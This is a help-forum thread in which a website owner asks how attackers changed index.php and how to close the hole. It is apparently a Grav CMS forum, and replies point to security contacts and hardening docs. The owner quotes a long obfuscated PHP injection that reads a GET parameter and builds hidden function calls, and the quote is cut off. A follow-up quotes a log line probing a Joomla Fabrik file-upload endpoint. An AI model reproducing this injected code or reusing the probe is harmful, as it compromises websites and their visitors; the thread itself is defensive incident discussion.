Hacking vulnerability


#1

The attackers have embedded code in several of my sites. How did they modify index.php and how to close the gap?

<?php
$OOO0_0_0_O='3004';
$O00O0__OO_=("t1j7n80g4hbcesydpvxuimkf6_olz2a5q-w93r");$OO00_0_O_O=$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{30}.$O00O0__OO_{21}.$O00O0__OO_{25}.$O00O0__OO_{13}.$O00O0__OO_{26}.$O00O0__OO_{11}.$O00O0__OO_{22}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{11}.$O00O0__OO_{27}.$O00O0__OO_{20}.$O00O0__OO_{12}.$O00O0__OO_{4}.$O00O0__OO_{0};$O0O0O_O0__=$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{30}.$O00O0__OO_{21}.$O00O0__OO_{25}.$O00O0__OO_{7}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{21}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{30}.$O00O0__OO_{25}.$O00O0__OO_{15}.$O00O0__OO_{30}.$O00O0__OO_{0}.$O00O0__OO_{30};$O_O0OO__00=$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{30}.$O00O0__OO_{21}.$O00O0__OO_{25}.$O00O0__OO_{13}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{10}.$O00O0__OO_{27}.$O00O0__OO_{26}.$O00O0__OO_{11}.$O00O0__OO_{22}.$O00O0__OO_{20}.$O00O0__OO_{4}.$O00O0__OO_{7};$OO__O00_0O=$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{30}.$O00O0__OO_{21}.$O00O0__OO_{25}.$O00O0__OO_{13}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{0}.$O00O0__OO_{20}.$O00O0__OO_{21}.$O00O0__OO_{12}.$O00O0__OO_{26}.$O00O0__OO_{19}.$O00O0__OO_{0};$O_OO_0_0O0=$O00O0__OO_{20}.$O00O0__OO_{7}.$O00O0__OO_{4}.$O00O0__OO_{26}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{25}.$O00O0__OO_{19}.$O00O0__OO_{13}.$O00O0__OO_{12}.$O00O0__OO_{37}.$O00O0__OO_{25}.$O00O0__OO_{30}.$O00O0__OO_{10}.$O00O0__OO_{26}.$O00O0__OO_{37}.$O00O0__OO_{0};$OO0O_0_0_O=$O00O0__OO_{23}.$O00O0__OO_{20}.$O00O0__OO_{27}.$O00O0__OO_{12}.$O00O0__OO_{25}.$O00O0__OO_{16}.$O00O0__OO_{19}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{11}.$O00O0__OO_{26}.$O00O0__OO_{4}.$O00O0__OO_{0}.$O00O0__OO_{12}.$O00O0__OO_{4}.$O00O0__OO_{0}.$O00O0__OO_{13};$OO0O_0O0__=$O00O0__OO_{23}.$O00O0__OO_{20}.$O00O0__OO_{27}.$O00O0__OO_{12}.$O00O0__OO_{25}.$O00O0__OO_{7}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{11}.$O00O0__OO_{26}.$O00O0__OO_{4}.$O00O0__OO_{0}.$O00O0__OO_{12}.$O00O0__OO_{4}.$O00O0__OO_{0}.$O00O0__OO_{13};$O_OO_00O0_=$O00O0__OO_{12}.$O00O0__OO_{18}.$O00O0__OO_{0}.$O00O0__OO_{12}.$O00O0__OO_{4}.$O00O0__OO_{13}.$O00O0__OO_{20}.$O00O0__OO_{26}.$O00O0__OO_{4}.$O00O0__OO_{25}.$O00O0__OO_{27}.$O00O0__OO_{26}.$O00O0__OO_{30}.$O00O0__OO_{15}.$O00O0__OO_{12}.$O00O0__OO_{15};$O0_O0__OO0=$O00O0__OO_{23}.$O00O0__OO_{19}.$O00O0__OO_{4}.$O00O0__OO_{11}.$O00O0__OO_{0}.$O00O0__OO_{20}.$O00O0__OO_{26}.$O00O0__OO_{4}.$O00O0__OO_{25}.$O00O0__OO_{12}.$O00O0__OO_{18}.$O00O0__OO_{20}.$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{13};$OO0__0_0OO=$O00O0__OO_{12}.$O00O0__OO_{37}.$O00O0__OO_{37}.$O00O0__OO_{26}.$O00O0__OO_{37}.$O00O0__OO_{25}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{16}.$O00O0__OO_{26}.$O00O0__OO_{37}.$O00O0__OO_{0}.$O00O0__OO_{20}.$O00O0__OO_{4}.$O00O0__OO_{7};$OO_0_0OO_0=$O00O0__OO_{11}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{30}.$O00O0__OO_{0}.$O00O0__OO_{12}.$O00O0__OO_{25}.$O00O0__OO_{23}.$O00O0__OO_{19}.$O00O0__OO_{4}.$O00O0__OO_{11}.$O00O0__OO_{0}.$O00O0__OO_{20}.$O00O0__OO_{26}.$O00O0__OO_{4};$O_O_00_OO0=$O00O0__OO_{13}.$O00O0__OO_{26}.$O00O0__OO_{11}.$O00O0__OO_{22}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{11}.$O00O0__OO_{26}.$O00O0__OO_{4}.$O00O0__OO_{4}.$O00O0__OO_{12}.$O00O0__OO_{11}.$O00O0__OO_{0};$OO00_0O__O=$O00O0__OO_{13}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{0}.$O00O0__OO_{20}.$O00O0__OO_{21}.$O00O0__OO_{12}.$O00O0__OO_{25}.$O00O0__OO_{27}.$O00O0__OO_{20}.$O00O0__OO_{21}.$O00O0__OO_{20}.$O00O0__OO_{0};$O_O0O_0O_0=$O00O0__OO_{7}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{9}.$O00O0__OO_{26}.$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{10}.$O00O0__OO_{14}.$O00O0__OO_{4}.$O00O0__OO_{30}.$O00O0__OO_{21}.$O00O0__OO_{12};$OOO0__0O0_=$O00O0__OO_{10}.$O00O0__OO_{30}.$O00O0__OO_{13}.$O00O0__OO_{12}.$O00O0__OO_{24}.$O00O0__OO_{8}.$O00O0__OO_{25}.$O00O0__OO_{15}.$O00O0__OO_{12}.$O00O0__OO_{11}.$O00O0__OO_{26}.$O00O0__OO_{15}.$O00O0__OO_{12};$O000_OOO__=$O00O0__OO_{13}.$O00O0__OO_{26}.$O00O0__OO_{11}.$O00O0__OO_{22}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{34}.$O00O0__OO_{37}.$O00O0__OO_{20}.$O00O0__OO_{0}.$O00O0__OO_{12};$O_0OO0_0O_=$O00O0__OO_{13}.$O00O0__OO_{26}.$O00O0__OO_{11}.$O00O0__OO_{22}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{11}.$O00O0__OO_{27}.$O00O0__OO_{26}.$O00O0__OO_{13}.$O00O0__OO_{12};$O0O_0__O0O=$O00O0__OO_{16}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{7}.$O00O0__OO_{25}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{16}.$O00O0__OO_{27}.$O00O0__OO_{30}.$O00O0__OO_{11}.$O00O0__OO_{12};$O_O0O0O0__=$O00O0__OO_{26}.$O00O0__OO_{10}.$O00O0__OO_{25}.$O00O0__OO_{12}.$O00O0__OO_{4}.$O00O0__OO_{15}.$O00O0__OO_{25}.$O00O0__OO_{23}.$O00O0__OO_{27}.$O00O0__OO_{19}.$O00O0__OO_{13}.$O00O0__OO_{9};$O00__0O_OO=$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37}.$O00O0__OO_{25}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{16}.$O00O0__OO_{27}.$O00O0__OO_{30}.$O00O0__OO_{11}.$O00O0__OO_{12};$O00OOO___0=$O00O0__OO_{13}.$O00O0__OO_{26}.$O00O0__OO_{11}.$O00O0__OO_{22}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{30}.$O00O0__OO_{15};$O0___0OO0O=$O00O0__OO_{23}.$O00O0__OO_{20}.$O00O0__OO_{27}.$O00O0__OO_{12}.$O00O0__OO_{25}.$O00O0__OO_{12}.$O00O0__OO_{18}.$O00O0__OO_{20}.$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{13};$OO0O0_O_0_=$O00O0__OO_{11}.$O00O0__OO_{19}.$O00O0__OO_{37}.$O00O0__OO_{27}.$O00O0__OO_{25}.$O00O0__OO_{13}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{26}.$O00O0__OO_{16}.$O00O0__OO_{0};$OOO0_0_0O_=$O00O0__OO_{30}.$O00O0__OO_{37}.$O00O0__OO_{37}.$O00O0__OO_{30}.$O00O0__OO_{14}.$O00O0__OO_{25}.$O00O0__OO_{13}.$O00O0__OO_{9}.$O00O0__OO_{20}.$O00O0__OO_{23}.$O00O0__OO_{0};$O__00O0OO_=$O00O0__OO_{16}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{7}.$O00O0__OO_{25}.$O00O0__OO_{21}.$O00O0__OO_{30}.$O00O0__OO_{0}.$O00O0__OO_{11}.$O00O0__OO_{9};$O00__OOO0_=$O00O0__OO_{11}.$O00O0__OO_{19}.$O00O0__OO_{37}.$O00O0__OO_{27}.$O00O0__OO_{25}.$O00O0__OO_{12}.$O00O0__OO_{37}.$O00O0__OO_{37}.$O00O0__OO_{26}.$O00O0__OO_{37};$O_00OO0O__=$O00O0__OO_{11}.$O00O0__OO_{19}.$O00O0__OO_{37}.$O00O0__OO_{27}.$O00O0__OO_{25}.$O00O0__OO_{11}.$O00O0__OO_{27}.$O00O0__OO_{26}.$O00O0__OO_{13}.$O00O0__OO_{12};$O_O_OO00_0=$O00O0__OO_{19}.$O00O0__OO_{37}.$O00O0__OO_{27}.$O00O0__OO_{12}.$O00O0__OO_{4}.$O00O0__OO_{11}.$O00O0__OO_{26}.$O00O0__OO_{15}.$O00O0__OO_{12};$O__O00O_O0=$O00O0__OO_{16}.$O00O0__OO_{30}.$O00O0__OO_{37}.$O00O0__OO_{13}.$O00O0__OO_{12}.$O00O0__OO_{25}.$O00O0__OO_{19}.$O00O0__OO_{37}.$O00O0__OO_{27};$O_000O_OO_=$O00O0__OO_{7}.$O00O0__OO_{28}.$O00O0__OO_{20}.$O00O0__OO_{4}.$O00O0__OO_{23}.$O00O0__OO_{27}.$O00O0__OO_{30}.$O00O0__OO_{0}.$O00O0__OO_{12};$O0O__0_OO0=$O00O0__OO_{11}.$O00O0__OO_{19}.$O00O0__OO_{37}.$O00O0__OO_{27}.$O00O0__OO_{25}.$O00O0__OO_{20}.$O00O0__OO_{4}.$O00O0__OO_{20}.$O00O0__OO_{0};$O00O_0OO__=$O00O0__OO_{11}.$O00O0__OO_{19}.$O00O0__OO_{37}.$O00O0__OO_{27}.$O00O0__OO_{25}.$O00O0__OO_{12}.$O00O0__OO_{18}.$O00O0__OO_{12}.$O00O0__OO_{11};$O00O_O__0O=$O00O0__OO_{26}.$O00O0__OO_{10}.$O00O0__OO_{25}.$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{30}.$O00O0__OO_{37}.$O00O0__OO_{0};$O__0OO_0O0=$O00O0__OO_{13}.$O00O0__OO_{16}.$O00O0__OO_{37}.$O00O0__OO_{20}.$O00O0__OO_{4}.$O00O0__OO_{0}.$O00O0__OO_{23};$O__00OO_0O=$O00O0__OO_{21}.$O00O0__OO_{0}.$O00O0__OO_{25}.$O00O0__OO_{37}.$O00O0__OO_{30}.$O00O0__OO_{4}.$O00O0__OO_{15};$OOO_O0_00_=$O00O0__OO_{20}.$O00O0__OO_{21}.$O00O0__OO_{16}.$O00O0__OO_{27}.$O00O0__OO_{26}.$O00O0__OO_{15}.$O00O0__OO_{12};$O00O0O___O=$O00O0__OO_{12}.$O00O0__OO_{18}.$O00O0__OO_{16}.$O00O0__OO_{27}.$O00O0__OO_{26}.$O00O0__OO_{15}.$O00O0__OO_{12};$OO_O0__O00=$O00O0__OO_{15}.$O00O0__OO_{20}.$O00O0__OO_{37}.$O00O0__OO_{4}.$O00O0__OO_{30}.$O00O0__OO_{21}.$O00O0__OO_{12};$O0_O00__OO=$O00O0__OO_{19}.$O00O0__OO_{13}.$O00O0__OO_{27}.$O00O0__OO_{12}.$O00O0__OO_{12}.$O00O0__OO_{16};$OO0_0OO0__=$O00O0__OO_{19}.$O00O0__OO_{4}.$O00O0__OO_{27}.$O00O0__OO_{20}.$O00O0__OO_{4}.$O00O0__OO_{22};$O00__OO_O0=$O00O0__OO_{13}.$O00O0__OO_{19}.$O00O0__OO_{10}.$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37};$O0__OO_O00=$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37}.$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37};$O__O_O00O0=$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37}.$O00O0__OO_{16}.$O00O0__OO_{26}.$O00O0__OO_{13};$O_O_O_O000=$O00O0__OO_{13}.$O00O0__OO_{0}.$O00O0__OO_{37}.$O00O0__OO_{27}.$O00O0__OO_{12}.$O00O0__OO_{4};$OO_O0__00O=$O00O0__OO_{9}.$O00O0__OO_{12}.$O00O0__OO_{30}.$O00O0__OO_{15}.$O00O0__OO_{12}.$O00O0__OO_{37};$O_O0O_00_O=$O00O0__OO_{23}.$O00O0__OO_{34}.$O00O0__OO_{37}.$O00O0__OO_{20}.$O00O0__OO_{0}.$O00O0__OO_{12};$OOO___O000=$O00O0__OO_{23}.$O00O0__OO_{11}.$O00O0__OO_{27}.$O00O0__OO_{26}.$O00O0__OO_{13}.$O00O0__OO_{12};$O_OOO_000_=$O00O0__OO_{21}.$O00O0__OO_{22}.$O00O0__OO_{15}.$O00O0__OO_{20}.$O00O0__OO_{37};$OOO00_0O__=$O00O0__OO_{23}.$O00O0__OO_{37}.$O00O0__OO_{12}.$O00O0__OO_{30}.$O00O0__OO_{15};$O_O_O000_O=$O00O0__OO_{23}.$O00O0__OO_{7}.$O00O0__OO_{12}.$O00O0__OO_{0}.$O00O0__OO_{13};$O0O0O_O__0=$O00O0__OO_{11}.$O00O0__OO_{26}.$O00O0__OO_{19}.$O00O0__OO_{4}.$O00O0__OO_{0};$O_0_O0O_0O=$O00O0__OO_{11}.$O00O0__OO_{9}.$O00O0__OO_{21}.$O00O0__OO_{26}.$O00O0__OO_{15};$O0O_O0__0O=$O00O0__OO_{0}.$O00O0__OO_{37}.$O00O0__OO_{20}.$O00O0__OO_{21};$OO00__OO_0=$O00O0__OO_{2}.$O00O0__OO_{26}.$O00O0__OO_{20}.$O00O0__OO_{4};$O__O0O_00O=$O00O0__OO_{23}.$O00O0__OO_{12}.$O00O0__OO_{26}.$O00O0__OO_{23};$O_0__OO0O0=$O00O0__OO_{15}.$O00O0__OO_{30}.$O00O0__OO_{0}.$O00O0__OO_{12};${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x5f\x5f\x30\x30\x4f"]('Content-Type:text/html;charset=utf-8');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x5f\x30\x5f\x30\x4f\x4f"](0);if(!function_exists('str_ireplace')){function str_ireplace($from,$to,$string){return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));}};$OOO__0_O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x4f\x4f\x5f\x30"]('$O__OO0_0O0=\'\',$O0_0_OO_0O=NULL,$O__O0O_0O0=array()','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f"]("/^http\\:\\/\\//si",$O__OO0_0O0)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x6f\x6f"])){$O_O0O_0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"]

Its very long, more then limit of simbols. I need help!


#2

Found this code:
193.201.224.210 - - [08/Oct/2018:04:41:58 +0300] "GET /index.php?option=com_fabrik&amp;format=raw&amp;task=plugin.pluginAjax&amp;plugin=fileupload&amp;method=ajax_upload HTTP/1.0" 404 417 "http://tiriv.ru/index.php?option=com_fabrik&amp;format=raw&amp;task=plugin.pluginAjax&amp;plugin=fileupload&amp;method=ajax_upload" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36


#3

@starfoxik According the README on Grav’s repo:

Security issues

If you discover a possible security issue related to Grav or one of its plugins, please email the core team at contact@getgrav.org and we’ll address it as soon as possible.


#4

Also read https://learn.getgrav.org/security/users#server-users-and-the-webmaster and https://learn.getgrav.org/security/server-side, edited files is almost always a lack of server-side protection and user auth.